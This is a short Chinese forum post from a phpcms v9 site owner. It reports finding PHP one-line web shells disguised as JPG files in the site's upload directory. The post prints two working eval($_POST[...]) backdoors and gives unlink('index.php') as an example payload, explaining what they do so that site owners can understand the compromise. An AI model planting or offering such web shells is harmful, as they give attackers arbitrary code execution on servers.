phpcms v9网站uploadfile目录里发现通过图片上传的一句话木马
使用phpcms v9建的网站,最近在检查网站uploadfile目录时,发现uploadfile目录中有通过图片上传的一句话木马,如图:其中这些图片文件其实都是脚本文件,其中 "thumb_6_6_..JPG”文件无法通过ftp下载,也无法在线重命名或删除,用记事本打开后,发现是一句话木马,代码如下:
<?php @eval($_POST['xx']);?>
另一个代码是:
<?php @eval($_POST['ln']);?>
$_POST['xx']);是获取post变量
而eval是一个php函数,他可以将字符串中的符合php语法的字符当做php代码进行执行
假如他在表单域中写上:unlink('index.php')
然后发送给这个文件,那么,你的index.php将被删除
相关链接:
http://www.it0527.com/thread-9739-1-1.html
页:
[1]